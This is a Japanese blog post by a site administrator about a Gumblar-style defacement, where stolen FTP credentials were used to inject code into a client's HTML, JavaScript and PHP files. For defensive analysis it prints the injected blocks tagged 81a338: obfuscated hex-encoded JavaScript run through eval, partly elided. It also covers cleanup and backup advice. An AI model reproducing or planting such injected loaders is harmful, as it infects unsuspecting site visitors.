WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

PPC 伊藤 歩 ざくざく君 MovableTYpe 大西良幸 トレンドアフィリエイト スクロール インターネット 掲示板 tool 山下 クラック 申請金ビジネス ブロックポリシー ネットビジネス大全集 流出 Baidu ネットガレージ クラウド変換 HTML4.0 セキュリティ ライブチャット バックアップ ECサイト IP LinkShaker 自動化 DTD アドセンス レビュー followmatic 球体 シャンプー ネットゲーム バイマ カスタマイズ 管理ツール Adobe force puzzle ネットビジネス最後の楽園 関根義光 大園麗花 IE 株式会社A-ブログレス Yahoo テンプレート css Google Maps API コピーボタン ツイッター アフィ匠 Windows 7 音量アイコン Tiger-Wing エクスチェンジ 副業術 ツール Diamond Affiliate Masters Program 人物 パズル 立体 脆弱性 ブラシ FTP getElementByTagName エキスパートメール 不正アクセス WEB マルウエア スムーズ .htaccess アレックス 出店料 ハート FireWorks 伊藤虎太郎 無料 石井匠 Newpost Catch クロスアフィリエイト エクスプローラー Wordpress Content Slide やしろ塾 トレンドキーワード XHTML 放射線 せどり ウインドウ wpXサーバー ping 配布 Login LockDown 大園転売塾 アフィリエイト プロファイル ボタン タスクバー 高額塾 EC moza ドメイン クラウド入力機能 池田純矢 YouTube Maniax 2017 IBS 百度 蝶乃舞 ネオヒルズアカデミー 管理画面 画像 無料オファー ぼかし 切り抜き 中山秀人 株式会社SRシステム CS6 大園式転売塾 レイアウト 三橋美仁 @PAGES 賢威 株式会社Free Agent Style 個人情報流出 ソース 改ざん フレンドシップメール 転売大園塾 改竄 フォローマティック テーマ PHP explorer ビジネス 短縮URLツール WP バイドゥー Ban Hammer Thunderbird バナー インフォトップ 株式会社SRシステム ランキング JavaScript 原田真 ユーチューブマニアクス2017 ウイルス KMSpico functions.php ソースコード Agency Business 宮田麗花 スカイプ グラデーション 新井浩 マニュアル 情報商材 北川 雅嗣 詐欺 ブロック BBIZ クリックランキング office 短縮URL Favicon やしろひろたみ SyntaxHighlighter KMS認証 ヤフーショッピング android Chrome 詐欺組織 MT Extension Manager リンクシェイカー Google Maps 感染 Line 登録禁止 ソフト アンダーグラウンドアフィリエイトクラブ 上位表示 与沢翼 久積篤史 関根塾 エディタ アイコン Windows プラグイン 優先順位 BUYMA google postpost アレックス式ネオせどりスクール system 不正送信 自己アフィリエイト タイガーウイング 個人情報 自動 ライオンアフィリエイト ファビコン 滑らか RMT DOCTYPE アクセス制限 株式会社WINGOOD Internet Explorer 日本語入力変換ソフト 既得権益 モザイク wordpress 株式会社バンザイ ムーバブルタイプ サイト改ざん Cash on Wordpress SmoothScroll.js 伊藤塾 切抜き アクセスアップ 権利収入 サンタ メルマガ配信システム RSS 定型文 ヤフー ライン 加工 量産 表示 比較 レイアウト崩れ 与沢翼×蝶乃舞 インターネットビジネススクール ブルートフォースアタック 到達率 レタープレス 小笠原健一 アンダーグラウンドメソッド html 加藤 秀吉 iphone 背景 がら空きビジネス スマホ 秒速で1億円稼ぐ男 CGI ネットショップ 特権ビジネス プロモーション ロリポップ インペリアルゴールド 株式会社ニュース CS5 秀吉塾天下統一 ブラクラ 高速ゲーム Youtube レンタルサーバー 81a338 トラフィック SKナレッジ SEO 村上省吾 スタイルシート 不労所得の神 twitter 固定ページ メモ デスクトップ Firefox 復元 マイクロソフト ワードプレス 特定のメールアドレス 自己アフィリ 伊藤 虎太郎 無断送信 ブラウザ document.all MasterCollection wp-login.php ヤフオク RSS Includes Pages getElementById もざ ping送信 High Concept Marketing インターネットエクスプローラー ネットビジネス 土屋ひろし

アーカイブ

エステトラブル

このページの先頭へ